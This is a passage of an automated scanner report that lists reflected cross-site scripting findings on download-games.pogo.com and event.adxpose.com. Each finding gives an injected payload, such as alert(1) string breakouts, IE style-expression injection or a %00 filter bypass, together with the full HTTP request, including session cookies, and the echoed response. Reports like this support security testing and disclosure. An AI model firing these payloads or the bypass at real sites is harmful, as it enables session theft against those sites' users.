   /* You may add or alter any code config here. */
       var s_server="121";
       va
...[SNIP]...

3.480. http://download-games.pogo.com/Category.aspx [refId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://download-games.pogo.com
Path:	/Category.aspx

Issue detail

The value of the refId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 411ba"%3balert(1)//c28d43abb37 was submitted in the refId parameter. This input was echoed as 411ba";alert(1)//c28d43abb37 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Category.aspx?code=1000&refId=Hot_Sellers411ba"%3balert(1)//c28d43abb37 HTTP/1.1
Host: download-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Content-Length: 61368
Cache-Control: private, max-age=14400
Date: Sun, 09 Jan 2011 02:10:14 GMT
Connection: close

<html>
<head>
<meta name="msvalidate.01" content="F6F676EB374D905262C4FF19D14E715D" />


   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">


...[SNIP]...
p_games]"
   /* E-commerce Variables */
   var s_state=""
   var s_zip=""
   var s_purchaseID=""
   var s_events=""
   var s_products="top_games;"
   var s_eVar1=""
   var s_eVar2=""
   var s_eVar6="Hot_Sellers411ba";alert(1)//c28d43abb37";
   var s_eVar7="Category Page";
   var s_eVar10="oberonpogostd";
   var s_Prop10="oberonpogostd";

   /* You may add or alter any code config here. */
       var s_server="102";
       va
...[SNIP]...

3.481. http://download-games.pogo.com/Category.aspx [refId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://download-games.pogo.com
Path:	/Category.aspx

Issue detail

The value of the refId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 818ae"style%3d"x%3aexpr/**/ession(alert(1))"026389c2ee8 was submitted in the refId parameter. This input was echoed as 818ae"style="x:expr/**/ession(alert(1))"026389c2ee8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /Category.aspx?code=1000&refId=Hot_Sellers818ae"style%3d"x%3aexpr/**/ession(alert(1))"026389c2ee8 HTTP/1.1
Host: download-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Content-Length: 63956
Cache-Control: private, max-age=14353
Date: Sun, 09 Jan 2011 02:10:06 GMT
Connection: close

<html>
<head>
<meta name="msvalidate.01" content="F6F676EB374D905262C4FF19D14E715D" />


<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

...[SNIP]...
<tr style="cursor:hand;" onclick="window.location.href='/Category.aspx?code=110051313&genre=Pogo Originals&RefID=Hot_Sellers818ae"style="x:expr/**/ession(alert(1))"026389c2ee8&Session=&orign=p_leftbar_catName&ln=en&=0'" height="25" Id="Cat_110051313" onmouseover="TurnOn(this.id,'on');" onmouseout="TurnOn(this.id,'off');" >
...[SNIP]...

3.482. http://download-games.pogo.com/deluxe.aspx [RefID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://download-games.pogo.com
Path:	/deluxe.aspx

Issue detail

The value of the RefID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %008cad4"%3balert(1)//fef0500bb88 was submitted in the RefID parameter. This input was echoed as 8cad4";alert(1)//fef0500bb88 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /deluxe.aspx?code=119761357&RefID=pogofree010711%008cad4"%3balert(1)//fef0500bb88 HTTP/1.1
Host: download-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Content-Length: 39950
Cache-Control: private, max-age=14373
Date: Sun, 09 Jan 2011 02:08:55 GMT
Connection: close

<HTML>
   <HEAD>


   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">


<script type="text/javascript" language="javascript" src="/JavaScri
...[SNIP]...
les */
   var s_state=""
   var s_zip=""
   var s_purchaseID=""
   var s_events="prodView"
   var s_products="newGames;Cake Mania To The Max"
   var s_eVar1=""
   var s_eVar2=""
   var s_eVar6="pogofree010711.8cad4";alert(1)//fef0500bb88";
   var s_eVar7="Game Page";
   var s_eVar10="oberonpogostd";
   var s_Prop10="oberonpogostd";

   /* You may add or alter any code config here. */
       var s_server="102";
       var s_
...[SNIP]...

3.483. http://download-games.pogo.com/deluxe.aspx [RefID parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://download-games.pogo.com
Path:	/deluxe.aspx

Issue detail

The value of the RefID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c86f7"%3b2ec25516e2f was submitted in the RefID parameter. This input was echoed as c86f7";2ec25516e2f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /deluxe.aspx?code=119714967&genre=Puzzle&RefID=c86f7"%3b2ec25516e2f&Session=&origin=HPTemplateGameList&ln=en HTTP/1.1
Host: download-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Content-Length: 48209
Cache-Control: private, max-age=14385
Date: Sun, 09 Jan 2011 02:08:58 GMT
Connection: close

<HTML>
   <HEAD>


   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">


<script type="text/javascript" language="javascript" src="/JavaScri
...[SNIP]...
ommerce Variables */
   var s_state=""
   var s_zip=""
   var s_purchaseID=""
   var s_events="prodView"
   var s_products="puzzle;Cradle Of Rome 2 Premium"
   var s_eVar1=""
   var s_eVar2=""
   var s_eVar6="c86f7";2ec25516e2f";
   var s_eVar7="Game Page";
   var s_eVar10="oberonpogostd";
   var s_Prop10="oberonpogostd";

   /* You may add or alter any code config here. */
       var s_server="103";
       var s_
...[SNIP]...

3.484. http://download-games.pogo.com/deluxe.aspx [RefID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://download-games.pogo.com
Path:	/deluxe.aspx

Issue detail

The value of the RefID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1d1b"style%3d"x%3aexpr/**/ession(alert(1))"3e8fc95c0c2 was submitted in the RefID parameter. This input was echoed as a1d1b"style="x:expr/**/ession(alert(1))"3e8fc95c0c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deluxe.aspx?code=119761357&RefID=pogofree010711a1d1b"style%3d"x%3aexpr/**/ession(alert(1))"3e8fc95c0c2 HTTP/1.1
Host: download-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Content-Length: 41016
Cache-Control: private, max-age=14386
Date: Sun, 09 Jan 2011 02:08:48 GMT
Connection: close

<HTML>
   <HEAD>


   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">


<script type="text/javascript" language="javascript" src="/JavaScri
...[SNIP]...
<tr style="cursor:hand;" onclick="window.location.href='/Category.aspx?code=110051313&genre=Pogo Originals&RefID=pogofree010711a1d1b"style="x:expr/**/ession(alert(1))"3e8fc95c0c2&Session=&orign=p_leftbar_catName&ln=en&=0'" height="25" Id="Cat_110051313" onmouseover="TurnOn(this.id,'on');" onmouseout="TurnOn(this.id,'off');" >
...[SNIP]...

3.485. http://download-games.pogo.com/deluxe.aspx [RefID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://download-games.pogo.com
Path:	/deluxe.aspx

Issue detail

The value of the RefID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 481fc"style%3d"x%3aexpr/**/ession(alert(1))"ad9a6c7f32 was submitted in the RefID parameter. This input was echoed as 481fc"style="x:expr/**/ession(alert(1))"ad9a6c7f32 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /deluxe.aspx?code=119714967&genre=Puzzle&RefID=481fc"style%3d"x%3aexpr/**/ession(alert(1))"ad9a6c7f32&Session=&origin=HPTemplateGameList&ln=en HTTP/1.1
Host: download-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Content-Length: 50333
Cache-Control: private, max-age=14400
Date: Sun, 09 Jan 2011 02:08:56 GMT
Connection: close

<HTML>
   <HEAD>


   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">


<script type="text/javascript" language="javascript" src="/JavaScri
...[SNIP]...
<tr style="cursor:hand;" onclick="window.location.href='/Category.aspx?code=110051313&genre=Pogo Originals&RefID=481fc"style="x:expr/**/ession(alert(1))"ad9a6c7f32&Session=&orign=HPTemplateGameList&ln=en&=0'" height="25" Id="Cat_110051313" onmouseover="TurnOn(this.id,'on');" onmouseout="TurnOn(this.id,'off');" >
...[SNIP]...

3.486. http://download-games.pogo.com/deluxe.aspx [origin parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://download-games.pogo.com
Path:	/deluxe.aspx

Issue detail

The value of the origin request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f38fc"style%3d"x%3aexpr/**/ession(alert(1))"e6b6265f679 was submitted in the origin parameter. This input was echoed as f38fc"style="x:expr/**/ession(alert(1))"e6b6265f679 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deluxe.aspx?code=119714967&genre=Puzzle&RefID=headernav_fp_shopmenu&Session=&origin=HPTemplateGameListf38fc"style%3d"x%3aexpr/**/ession(alert(1))"e6b6265f679&ln=en HTTP/1.1
Host: download-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Content-Length: 51683
Cache-Control: private, max-age=14366
Date: Sun, 09 Jan 2011 02:09:35 GMT
Connection: close

<HTML>
   <HEAD>


   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">


<script type="text/javascript" language="javascript" src="/JavaScri
...[SNIP]...
<tr style="cursor:hand;" onclick="window.location.href='/Category.aspx?code=110051313&genre=Pogo Originals&RefID=headernav_fp_shopmenu&Session=&orign=HPTemplateGameListf38fc"style="x:expr/**/ession(alert(1))"e6b6265f679&ln=en&=0'" height="25" Id="Cat_110051313" onmouseover="TurnOn(this.id,'on');" onmouseout="TurnOn(this.id,'off');" >
...[SNIP]...

3.487. http://download-games.pogo.com/deluxe.aspx [refid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://download-games.pogo.com
Path:	/deluxe.aspx

Issue detail

The value of the refid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00fb3e9"-alert(1)-"008cc735cb4 was submitted in the refid parameter. This input was echoed as fb3e9"-alert(1)-"008cc735cb4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /deluxe.aspx?code=11964850&refid=14hero_bj3b%00fb3e9"-alert(1)-"008cc735cb4&intcmp=14hero_bj3b&pageSection=free_home_spotlight HTTP/1.1
Host: download-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Content-Length: 49260
Cache-Control: private, max-age=14400
Date: Sun, 09 Jan 2011 02:08:54 GMT
Connection: close

<HTML>
   <HEAD>


   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">


<script type="text/javascript" language="javascript" src="/JavaScri
...[SNIP]...
commerce Variables */
   var s_state=""
   var s_zip=""
   var s_purchaseID=""
   var s_events="prodView"
   var s_products="puzzle;Bejeweled 3"
   var s_eVar1=""
   var s_eVar2=""
   var s_eVar6="14hero_bj3b.fb3e9"-alert(1)-"008cc735cb4";
   var s_eVar7="Game Page";
   var s_eVar10="oberonpogostd";
   var s_Prop10="oberonpogostd";

   /* You may add or alter any code config here. */
       var s_server="103";
       var s_
...[SNIP]...

3.488. http://download-games.pogo.com/deluxe.aspx [refid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://download-games.pogo.com
Path:	/deluxe.aspx

Issue detail

The value of the refid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e35b8"style%3d"x%3aexpr/**/ession(alert(1))"2417bd62531 was submitted in the refid parameter. This input was echoed as e35b8"style="x:expr/**/ession(alert(1))"2417bd62531 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deluxe.aspx?code=11964850&refid=14ma_bj3e35b8"style%3d"x%3aexpr/**/ession(alert(1))"2417bd62531&pageSection=free_home_marketing_alley HTTP/1.1
Host: download-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Content-Length: 50504
Cache-Control: private, max-age=14356
Date: Sun, 09 Jan 2011 02:08:47 GMT
Connection: close

<HTML>
   <HEAD>


   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">


<script type="text/javascript" language="javascript" src="/JavaScri
...[SNIP]...
<tr style="cursor:hand;" onclick="window.location.href='/Category.aspx?code=110051313&genre=Pogo Originals&RefID=14ma_bj3e35b8"style="x:expr/**/ession(alert(1))"2417bd62531&Session=&orign=p_leftbar_catName&ln=en&=0'" height="25" Id="Cat_110051313" onmouseover="TurnOn(this.id,'on');" onmouseout="TurnOn(this.id,'off');" >
...[SNIP]...

3.489. http://download-games.pogo.com/deluxe.aspx [refid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://download-games.pogo.com
Path:	/deluxe.aspx

Issue detail

The value of the refid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cc08"%3balert(1)//ff4a98db4bc was submitted in the refid parameter. This input was echoed as 6cc08";alert(1)//ff4a98db4bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /deluxe.aspx?code=11964850&refid=14ma_bj36cc08"%3balert(1)//ff4a98db4bc&pageSection=free_home_marketing_alley HTTP/1.1
Host: download-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Content-Length: 48974
Cache-Control: private, max-age=14353
Date: Sun, 09 Jan 2011 02:08:52 GMT
Connection: close

<HTML>
   <HEAD>


   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">


<script type="text/javascript" language="javascript" src="/JavaScri
...[SNIP]...
* E-commerce Variables */
   var s_state=""
   var s_zip=""
   var s_purchaseID=""
   var s_events="prodView"
   var s_products="puzzle;Bejeweled 3"
   var s_eVar1=""
   var s_eVar2=""
   var s_eVar6="14ma_bj36cc08";alert(1)//ff4a98db4bc";
   var s_eVar7="Game Page";
   var s_eVar10="oberonpogostd";
   var s_Prop10="oberonpogostd";

   /* You may add or alter any code config here. */
       var s_server="103";
       var s_
...[SNIP]...

3.490. http://download-games.pogo.com/downloads.aspx [refid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://download-games.pogo.com
Path:	/downloads.aspx

Issue detail

The value of the refid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f64dd"%3balert(1)//6499779a148 was submitted in the refid parameter. This input was echoed as f64dd";alert(1)//6499779a148 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /downloads.aspx?site=pogo&refid=f64dd"%3balert(1)//6499779a148&ifw=756&pageSection=homnav_downloads_store&ifh=210&lkey=x HTTP/1.1
Host: download-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Content-Length: 134288
Cache-Control: private, max-age=14351
Date: Sun, 09 Jan 2011 02:11:09 GMT
Connection: close

<HTML>
   <HEAD>
<meta name="msvalidate.01" content="F6F676EB374D905262C4FF19D14E715D" />
<meta name="description" content="Download games at Pogo including puzzle games, hidden object games, Pogo
...[SNIP]...

   var s_pageName="HomePage"
   /* E-commerce Variables */
   var s_state=""
   var s_zip=""
   var s_purchaseID=""
   var s_events=""
   var s_products=";"
   var s_eVar1=""
   var s_eVar2=""
   var s_eVar6="f64dd";alert(1)//6499779a148";
   var s_eVar7="Home Page";
   var s_eVar10="oberonpogostd";
   var s_Prop10="oberonpogostd";

   /* You may add or alter any code config here. */
       var s_server="121";
       var s_
...[SNIP]...

3.491. http://event.adxpose.com/event.flow [uid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://event.adxpose.com
Path:	/event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 379da<script>alert(1)</script>ca2fdb18c7 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.pandora.com%2Fpeople%2F%3Fcf8db%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E09862348e83%3D1&uid=ZC45X9Axu6NOUFfX_261541379da<script>alert(1)</script>ca2fdb18c7&xy=0%2C0&wh=728%2C90&vchannel=65044&cid=101198&cookieenabled=1&screenwh=1920%2C1200&adwh=728%2C90&colordepth=16&flash=10.1&iframed=1 HTTP/1.1
